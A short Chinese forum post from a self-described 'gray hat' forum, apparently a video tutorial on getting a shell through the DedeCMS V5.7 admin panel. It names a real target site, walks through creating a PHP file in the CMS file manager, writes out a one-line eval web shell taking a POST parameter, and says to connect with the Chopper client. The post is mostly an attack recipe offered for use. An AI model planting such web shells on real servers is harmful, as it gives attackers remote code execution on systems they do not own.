普及网络安全知识,推动信息技术发展。
为祖国的网络安全撑起一片蓝天,为网络安全爱好者构建一方家园。
欢迎来到灰帽程序员论坛,我们的网址是:
论坛以技术交流为主,非商业性质论坛。
大家好,我是小雨,QQ:798033502
今天给大家带来的教程是《Web-Attak系列教程第二季0x07讲——dedecmsV5.7后台拿shell》
Site:http://5esou.com/
视频地址:http://v.youku.com/v_show/id_XNTQzNzExMjIw.html
后台默认的,我之前登录过一次,现在重新登录下。
模块——文件管理器——新建文件——文件名:bbst.php
文件内容:<?php @eval($_POST['cmcc']);?>
菜刀连接之
OK,成功拿下shell.
菜鸟作品,大牛勿喷!